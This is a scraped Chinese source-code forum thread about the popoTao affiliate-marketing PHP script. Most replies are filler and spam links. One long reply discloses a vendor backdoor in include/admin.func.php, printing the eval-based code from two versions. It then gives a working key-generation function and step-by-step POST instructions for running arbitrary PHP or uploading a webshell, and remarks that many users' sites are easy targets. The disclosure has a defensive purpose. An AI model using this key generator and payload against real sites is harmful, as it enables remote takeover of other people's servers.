源码论坛公告:本站是一个交流学习建站资源的社区论坛,旨在交流学习源码脚本等资源技术,欢迎大家投稿发言! 【点击此处将锦尚放在桌面

源码论坛,商业源码下载,尽在锦尚中国商业源码论坛

 找回密码
 会员注册

QQ登录

只需一步,快速开始

楼主: 洪七公
打印 上一主题 下一主题

[API返现] 【PHP】淘客泡泡popoTao最新商业开源版[20130204] 跟官方保持同步更新 修复跳转错误

  [复制链接]

26

主题

700

帖子

3

金币

初级会员

Rank: 1

积分
1737
71#
发表于 2013-4-28 08:08:12 | 只看该作者
为了不扰乱会员对源码的测试,有问题咨询右侧客服不要直接回复,否则视为非法信息屏蔽会员ID!
我要刷 !!

9

主题

277

帖子

50

金币

初级会员

Rank: 1

积分
608
72#
发表于 2013-4-28 08:19:33 | 只看该作者
为了不扰乱会员对源码的测试,有问题咨询右侧客服不要直接回复,否则视为非法信息屏蔽会员ID!
淘客泡泡popoTao最新商业开源版[20130204] 跟官方保持同步更新 修复跳转错误 [修改]

15

主题

2901

帖子

-820

金币

初级会员

Rank: 1

积分
428
73#
发表于 2013-4-28 08:34:50 | 只看该作者
为了不扰乱会员对源码的测试,有问题咨询右侧客服不要直接回复,否则视为非法信息屏蔽会员ID!
这个可以有

2

主题

917

帖子

805

金币

初级会员

屌死喏

Rank: 1

积分
2057
QQ
74#
发表于 2013-4-28 08:39:30 | 只看该作者
为了不扰乱会员对源码的测试,有问题咨询右侧客服不要直接回复,否则视为非法信息屏蔽会员ID!
我刷刷
网购帮 网购超市
tmallshopping.c

4

主题

152

帖子

-12

金币

初级会员

Rank: 1

积分
500
75#
发表于 2013-4-28 09:56:30 | 只看该作者
为了不扰乱会员对源码的测试,有问题咨询右侧客服不要直接回复,否则视为非法信息屏蔽会员ID!
我要刷 !!

4

主题

152

帖子

-12

金币

初级会员

Rank: 1

积分
500
76#
发表于 2013-4-28 10:01:35 | 只看该作者
为了不扰乱会员对源码的测试,有问题咨询右侧客服不要直接回复,否则视为非法信息屏蔽会员ID!
你好!早晨

4

主题

152

帖子

-12

金币

初级会员

Rank: 1

积分
500
77#
发表于 2013-4-28 10:57:33 | 只看该作者
为了不扰乱会员对源码的测试,有问题咨询右侧客服不要直接回复,否则视为非法信息屏蔽会员ID!
我要刷 !!

18

主题

1375

帖子

56

金币

初级会员

Rank: 1

积分
911
QQ
78#
发表于 2013-4-28 11:19:49 | 只看该作者
为了不扰乱会员对源码的测试,有问题咨询右侧客服不要直接回复,否则视为非法信息屏蔽会员ID!
额额~还行不~?

4

主题

152

帖子

-12

金币

初级会员

Rank: 1

积分
500
79#
发表于 2013-4-28 11:40:14 | 只看该作者
为了不扰乱会员对源码的测试,有问题咨询右侧客服不要直接回复,否则视为非法信息屏蔽会员ID!
淘客程序官方后门漏洞

由于官方几个月不更新,跟不上淘宝API的更新速度,所以我想自己解决,把官方的6个ZEND加密过的PHP文件无限制了。结果发现了极其恶心的事情。

在include/admin.func.php文件的最下面,发现以下代码,这是2012年9月27日的版本。妈的,ZEND加密保护标识还有网站授权认证无可厚非。但是利用加密加入后门。就太可耻了。

view source
print?
1        if ( isset( $_POST[''_tks''] ) && ( $tks = trim( $_POST[''_tks''] ) ) )
2        {
3        $_tks = explode( "|", ~base64_decode( strrev( substr( $tks, 3, 5 ). substr( $tks, 8 ) . substr( $tks, 0, 3 ) ) ) );
4        if ( trim( $_tks[1] ) == "K_".date( "Y_m_d" ) && ( strpos( $_SERVER[''HTTP_HOST''], trim( $_tks[0] ) ) !== FALSE || strpos( $_SERVER[''SERVER_NAME''], trim( $_tks[0] ) ) !== FALSE ) )
5        {
6        eval( $_POST[''tao''] );
7        }
8        exit( );
9        }
后来2月4号跟官方交涉,官方还死不承认,但是在之后的几个小时内。马上更新了补丁。也就是20130204的版本。还是信不过。继续开源。发现仍不思悔改。只不过提交的参数名变了。在程序里留个后门。对用户是多么的不负责。再次鄙视。后门代码还是include/admin.func.php文件里的最下面。

view source
print?
1        if ( isset( $_POST[''_MDFK''] ) && ( $tks = trim( $_POST[''_MDFK''] ) ) )
2        {
3        $_tks = explode( "|", ~base64_decode( strrev( substr( $tks, 3, 5 ). substr( $tks, 8 ) . substr( $tks, 0, 3 ) ) ) );
4        if ( trim( $_tks[1] ) == "K_".date( "Y_m_d" ) && ( strpos( $_SERVER[''HTTP_HOST''], trim( $_tks[0] ) ) !== FALSE || strpos( $_SERVER[''SERVER_NAME''], trim( $_tks[0] ) ) !== FALSE ) )
5        {
6        eval( $_POST[''_HkBs''] );
7        }
8        exit( );
9        }
既然对用户这么不负责,那我只有公布泡泡淘的丑陋行径了。如果只是漏洞,可以不公布利用方法,但是这里是官方留下的后门。那就一定要给出利用方法。

里用原理就是提交一个字符串,然后通过了域名和时间的验证,顺利到达eval这里。活生生的一句话后门。不搞安全的可能不知道。我只需要说,有这句代码,控制你们网站的服务器。真的没什么问题。把PID什么的改掉。你的网站就帮别人赚钱吧。

view source
print?
01        function getfuckkey($domain = ''''){
02        $time = ''K_''.date("Y_m_d");
03        //$domain = $_SERVER[''HTTP_HOST''];
04        if ($domain) {
05        $key = $domain.''|''.$time;
06        $key2 = base64_encode(~$key);
07        $key3 = strrev($key2);
08        $k1 = substr( $key3, 0, 5 );
09        $k2 = substr( $key3, 5, -3 );
10        $k3 = substr( $key3, -3 );
11        $key4 = $k3.$k1.$k2;
12        return $key4;
13        } else {
14        return '''';
15        }
16        }
17        echo getfuckkey(''xiaosajie.com'');
这样可以得到字符串,然后post方式,注意必须POST方式提交,提交到include/admin.func.php?_MDFK={key}&_HkBs=phpinfo()

就可以查看phpinfo();或者直接上传大马,随便了。

泡泡淘的用户很多,在官方论坛里,很多人的帖子签名都有网站。随便搞就是一大堆。

本文附件上,有本人和官方的QQ对话、对话后有文件被修改的截图以及利用程序。

2月4号和官方交涉后,2月6号,我的文件就被修改过。整个网站就打不开了。不用说也能想到是什么人做的了。

4

主题

478

帖子

406

金币

初级会员

Rank: 1

积分
1099
80#
发表于 2013-4-28 12:00:11 | 只看该作者
为了不扰乱会员对源码的测试,有问题咨询右侧客服不要直接回复,否则视为非法信息屏蔽会员ID!
很强大的程序啊
北京阳光房www.yangguangfang58.com驻马店论坛www.henanmh.com玉米汁www.yumizhi8.com建筑节能www.huaboonl
您需要登录后才可以回帖 登录 | 会员注册

本版积分规则

锦尚中国源码论坛

聚合标签|锦尚中国,为中国网站设计添动力 ( 鲁ICP备09033200号 ) |网站地图

GMT+8, 2024-11-22 14:52 , Processed in 0.154239 second(s), 24 queries .

带宽由 锦尚数据 提供 专业的数据中心

© 锦尚中国源码论坛 52jscn Inc. 非法入侵必将受到法律制裁 法律顾问:IT法律网 & 褚福省律师 锦尚爱心 版权申诉 版权与免责声明